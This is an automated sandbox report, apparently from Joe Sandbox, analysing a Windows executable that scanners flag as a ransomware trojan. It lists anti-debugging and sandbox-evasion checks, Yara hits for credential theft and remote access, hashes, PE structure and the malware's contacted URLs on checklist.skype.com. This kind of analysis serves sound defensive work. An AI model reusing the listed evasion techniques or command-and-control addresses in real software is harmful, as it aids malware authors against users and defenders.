      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0222421F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_0222421F
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02228551 NtQueryVirtualMemory,0_2_02228551
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00501C58 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_00501C58
      Source: server.exeReversingLabs: Detection: 35%
      Source: server.exeVirustotal: Detection: 42%
      Source: server.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\server.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_022230D5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_022230D5
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/0
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\server.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack .text:ER;.data:W;.pozipiw:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
      Source: C:\Users\user\Desktop\server.exeUnpacked PE file: 0.2.server.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02227F30 push ecx; ret 0_2_02227F39
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0222831B push ecx; ret 0_2_0222832B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00723408 push ds; ret 0_2_00723409
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0071D95D push 8B8751D0h; retf 0_2_0071D962
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00722D2A push ebp; ret 0_2_00722D2F
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00723783 push ds; ret 0_2_00723791
      Source: server.exeStatic PE information: section name: .pozipiw
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: Yara matchFile source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\server.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\server.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
      Source: C:\Users\user\Desktop\server.exe TID: 1212Thread sleep count: 40 > 30Jump to behavior
      Source: C:\Users\user\Desktop\server.exe TID: 1212Thread sleep count: 32 > 30Jump to behavior
      Source: C:\Users\user\Desktop\server.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
      Source: C:\Users\user\Desktop\server.exeAPI call chain: ExitProcess graph end node
      Source: server.exe, 00000000.00000002.517572455.0000000000729000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\server.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0050092B mov eax, dword ptr fs:[00000030h]0_2_0050092B
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00500D90 mov eax, dword ptr fs:[00000030h]0_2_00500D90
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_0071AE32 push dword ptr fs:[00000030h]0_2_0071AE32
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401000 LoadLibraryA,GetProcAddress,0_2_00401000
      Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_004019F1
      Source: C:\Users\user\Desktop\server.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,CreateThread,QueueUserAPC,GetLastError,TerminateThread,SetLastError,WaitForSingleObject,GetExitCodeThread,GetLastError,GetLastError,0_2_00501C58
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02223BD3 cpuid 0_2_02223BD3
      Source: C:\Users\user\Desktop\server.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_00401D68 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_00401D68
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_004015B0 GetSystemTimeAsFileTime,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_004015B0
      Source: C:\Users\user\Desktop\server.exeCode function: 0_2_02223BD3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_02223BD3

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000000.00000003.475185629.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475209392.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475243148.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475160545.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.517888013.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475262264.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475071788.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475293261.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000003.475126173.0000000002BD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: server.exe PID: 6052, type: MEMORYSTR
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation
      Path InterceptionPath Interception11
      Virtualization/Sandbox Evasion
      1
      Input Capture
      1
      System Time Discovery
      Remote Services1
      Input Capture
      Exfiltration Over Other Network Medium2
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      Data Encrypted for Impact
      Default Accounts12
      Native API
      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Obfuscated Files or Information
      LSASS Memory11
      Security Software Discovery
      Remote Desktop Protocol11
      Archive Collected Data
      Exfiltration Over Bluetooth1
      Non-Application Layer Protocol
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
      Software Packing
      Security Account Manager11
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
      Process Discovery
      Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      Account Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
      System Owner/User Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      Remote System Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
      System Information Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      server.exe36%ReversingLabsWin32.Ransomware.LockbitCrypt
      server.exe42%VirustotalBrowse
      server.exe100%Joe Sandbox ML
      No Antivirus matches
      SourceDetectionScannerLabelLinkDownload
      0.2.server.exe.2220000.2.unpack100%AviraHEUR/AGEN.1245293Download File
      0.2.server.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      checklist.skype.com
      unknown
      unknownfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://checklist.skype.com/drew/8GsEYWG5R7vgd6ovGci/nrUBbPIi4nn3B9s17IICy8/dABAhwF5Li84O/L9tQ_2Fw/xJserver.exe, 00000000.00000002.517572455.0000000000768000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://checklist.skype.com/drew/8GsEYWG5R7vgd6ovGci/nrUBbPIi4nn3B9s17IICy8/dABAhwF5Li84O/L9tQ_2Fw/server.exe, 00000000.00000002.517572455.0000000000773000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://checklist.skype.com/server.exe, 00000000.00000002.517572455.0000000000768000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              No contacted IP infos
              Joe Sandbox Version:37.0.0 Beryl
              Analysis ID:830549
              Start date and time:2023-03-20 13:46:26 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 9s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:13
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:server.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/0@1/0
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 47.7% (good quality ratio 46.4%)
              • Quality average: 82.1%
              • Quality standard deviation: 26.5%
              HCA Information:
              • Successful, ratio: 97%
              • Number of executed functions: 44
              • Number of non-executed functions: 36
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              No simulations
              No context
              No context
              No context
              No context
              No context
              No created / dropped files found
              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.799872795596262
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:server.exe
              File size:181760
              MD5:2ca14653601a8e9adb830e183c5874d7
              SHA1:0e75f94eb23c8aac9b3301951d2df8639304a165
              SHA256:a9934cc506821e82237fdaf471f845e1e027b37841d635f971b8df6853e9d7f9
              SHA512:6bc10edfc7f586cca680eebff64ce6e4a126961422027c1c8b115d879a893ab16727872aba8c5574ebd11a5a31bad757e72d5d4a42c842cf527879d87b42a0a3
              SSDEEP:3072:QSR/F1oN0510sk/iH6xxkhdbV5Vk6T23Ls/CYi:9vom0KH6sN/VkJLs/C
              TLSH:F5049EC393907C65E4168A3E8E2EC2F4770DFC91CE5DAB56E2186B2F08BC1B2D562751
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.Q.f.Q.f.Q...Q.f.Q..4Q.f.Q...Q.f.Q..9Q.f.Q.f.Q.f.Q...Q.f.Q..0Q.f.Q..7Q.f.QRich.f.Q........PE..L.....Pa...................
              Icon Hash:9aa2521289929292
              Entrypoint:0x402f31
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
              Time Stamp:0x61501880 [Sun Sep 26 06:51:44 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:1
              File Version Major:5
              File Version Minor:1
              Subsystem Version Major:5
              Subsystem Version Minor:1
              Import Hash:2bf4bd16bd9a3948cc472dde1e8c8ccd
              Instruction
              call 00007F85B4470EE0h
              jmp 00007F85B446E50Eh
              mov eax, 0040D008h
              ret
              mov eax, dword ptr [0049D700h]
              push esi
              push 00000014h
              pop esi
              test eax, eax
              jne 00007F85B446E689h
              mov eax, 00000200h
              jmp 00007F85B446E688h
              cmp eax, esi
              jnl 00007F85B446E689h
              mov eax, esi
              mov dword ptr [0049D700h], eax
              push 00000004h
              push eax
              call 00007F85B4470F8Eh
              pop ecx
              pop ecx
              mov dword ptr [0049C6E0h], eax
              test eax, eax
              jne 00007F85B446E6A0h
              push 00000004h
              push esi
              mov dword ptr [0049D700h], esi
              call 00007F85B4470F75h
              pop ecx
              pop ecx
              mov dword ptr [0049C6E0h], eax
              test eax, eax
              jne 00007F85B446E687h
              push 0000001Ah
              pop eax
              pop esi
              ret
              xor edx, edx
              mov ecx, 0040D008h
              jmp 00007F85B446E687h
              mov eax, dword ptr [0049C6E0h]
              mov dword ptr [edx+eax], ecx
              add ecx, 20h
              add edx, 04h
              cmp ecx, 0040D288h
              jl 00007F85B446E66Ch
              push FFFFFFFEh
              pop esi
              xor edx, edx
              mov ecx, 0040D018h
              push edi
              mov eax, edx
              sar eax, 05h
              mov eax, dword ptr [0049C5E0h+eax*4]
              mov edi, edx
              and edi, 1Fh
              shl edi, 06h
              mov eax, dword ptr [edi+eax]
              cmp eax, FFFFFFFFh
              je 00007F85B446E68Ah
              cmp eax, esi
              je 00007F85B446E686h
              test eax, eax
              jne 00007F85B446E684h
              mov dword ptr [ecx], esi
              add ecx, 20h
              inc edx
              cmp ecx, 0040D078h
              jl 00007F85B446E650h
              pop edi
              xor eax, eax
              pop esi
              ret
              call 00007F85B446EC96h
              cmp byte ptr [00000000h], 00000000h
              Programming Language:
              • [C++] VS2010 build 30319
              • [ASM] VS2010 build 30319
              • [ C ] VS2010 build 30319
              • [IMP] VS2008 SP1 build 30729
              • [RES] VS2010 build 30319
              • [LNK] VS2010 build 30319
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0xb84c0x3c.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x9f0000xdaf0.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2b080x40.text
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x19c.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000xb1ae0xb200False0.5147691362359551data6.028090938354116IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data0xd0000x9070c0x13200False0.9456188725490197data7.850203467316377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .pozipiw0x9e0000x960x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x9f0000xdaf00xdc00False0.4134765625data4.476679864737693IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              AFX_DIALOG_LAYOUT0xab5980x2data
              TONIZITOHOWAPEVUMOBEM0xaaea00x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishFinland
              TONIZITOHOWAPEVUMOBEM0xaaea00x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishNorway
              TONIZITOHOWAPEVUMOBEM0xaaea00x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishSweden
              RT_CURSOR0xab5a00x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
              RT_CURSOR0xab6d00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
              RT_CURSOR0xab7c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
              RT_ICON0x9f6800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
              RT_ICON0x9f6800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
              RT_ICON0x9f6800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
              RT_ICON0x9ff280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
              RT_ICON0x9ff280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
              RT_ICON0x9ff280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
              RT_ICON0xa0ff80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
              RT_ICON0xa0ff80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
              RT_ICON0xa0ff80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
              RT_ICON0xa18a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
              RT_ICON0xa18a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
              RT_ICON0xa18a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
              RT_ICON0xa3e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
              RT_ICON0xa3e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
              RT_ICON0xa3e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
              RT_ICON0xa4f200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland
              RT_ICON0xa4f200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway
              RT_ICON0xa4f200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden
              RT_ICON0xa5dc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland
              RT_ICON0xa5dc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway
              RT_ICON0xa5dc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden
              RT_ICON0xa64900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland
              RT_ICON0xa64900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway
              RT_ICON0xa64900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden
              RT_ICON0xa69f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
              RT_ICON0xa69f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
              RT_ICON0xa69f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
              RT_ICON0xa8fa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
              RT_ICON0xa8fa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
              RT_ICON0xa8fa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
              RT_ICON0xaa0480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland
              RT_ICON0xaa0480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway
              RT_ICON0xaa0480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden
              RT_ICON0xaa9d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland
              RT_ICON0xaa9d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway
              RT_ICON0xaa9d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden
              RT_ACCELERATOR0xab4e00x78dataSami LappishFinland
              RT_ACCELERATOR0xab4e00x78dataSami LappishNorway
              RT_ACCELERATOR0xab4e00x78dataSami LappishSweden
              RT_ACCELERATOR0xab4380xa8dataSami LappishFinland
              RT_ACCELERATOR0xab4380xa8dataSami LappishNorway
              RT_ACCELERATOR0xab4380xa8dataSami LappishSweden
              RT_GROUP_CURSOR0xac8680x30data
              RT_GROUP_ICON0xa4ef00x30dataSami LappishFinland
              RT_GROUP_ICON0xa4ef00x30dataSami LappishNorway
              RT_GROUP_ICON0xa4ef00x30dataSami LappishSweden
              RT_GROUP_ICON0xa0fd00x22dataSami LappishFinland
              RT_GROUP_ICON0xa0fd00x22dataSami LappishNorway
              RT_GROUP_ICON0xa0fd00x22dataSami LappishSweden
              RT_GROUP_ICON0xaae380x68dataSami LappishFinland
              RT_GROUP_ICON0xaae380x68dataSami LappishNorway
              RT_GROUP_ICON0xaae380x68dataSami LappishSweden
              RT_VERSION0xac8980x258data
              None0xab5580xadataSami LappishFinland
              None0xab5580xadataSami LappishNorway
              None0xab5580xadataSami LappishSweden
              None0xab5680xadataSami LappishFinland
              None0xab5680xadataSami LappishNorway
              None0xab5680xadataSami LappishSweden
              None0xab5780xadataSami LappishFinland
              None0xab5780xadataSami LappishNorway
              None0xab5780xadataSami LappishSweden
              None0xab5880xadataSami LappishFinland
              None0xab5880xadataSami LappishNorway
              None0xab5880xadataSami LappishSweden
              DLLImport
              KERNEL32.dllPulseEvent, SetDefaultCommConfigA, FindFirstFileW, EnumCalendarInfoA, CopyFileExW, GetConsoleAliasExesA, _llseek, BuildCommDCBAndTimeoutsA, GetConsoleAliasA, GetCurrentProcess, InterlockedCompareExchange, GetWindowsDirectoryA, EnumTimeFormatsA, WriteFileGather, EnumResourceTypesA, ActivateActCtx, GetFirmwareEnvironmentVariableA, LoadLibraryW, Sleep, ReadConsoleInputA, LeaveCriticalSection, GetFileAttributesW, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, lstrcmpW, GlobalUnlock, RaiseException, SetCurrentDirectoryA, SetLastError, GetProcAddress, GlobalGetAtomNameA, OpenWaitableTimerA, LocalAlloc, FindFirstVolumeMountPointW, AddAtomA, FindNextFileA, GetModuleHandleA, GetCPInfoExA, SetCalendarInfoA, DeleteFileW, EnumCalendarInfoExA, LocalFree, GetLastError, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, EnterCriticalSection, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, GetModuleHandleW, ExitProcess, WriteFile, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapFree, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, WriteConsoleW, MultiByteToWideChar, IsProcessorFeaturePresent, LCMapStringW, GetStringTypeW, HeapSize, CloseHandle, CreateFileW
              USER32.dllLoadMenuA
              Language of compilation systemCountry where language is spokenMap
              Sami LappishFinland
              Sami LappishNorway
              Sami LappishSweden
              TimestampSource PortDest PortSource IPDest IP
              Mar 20, 2023 13:48:06.764988899 CET4997753192.168.2.38.8.8.8
              Mar 20, 2023 13:48:06.785341024 CET53499778.8.8.8192.168.2.3
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
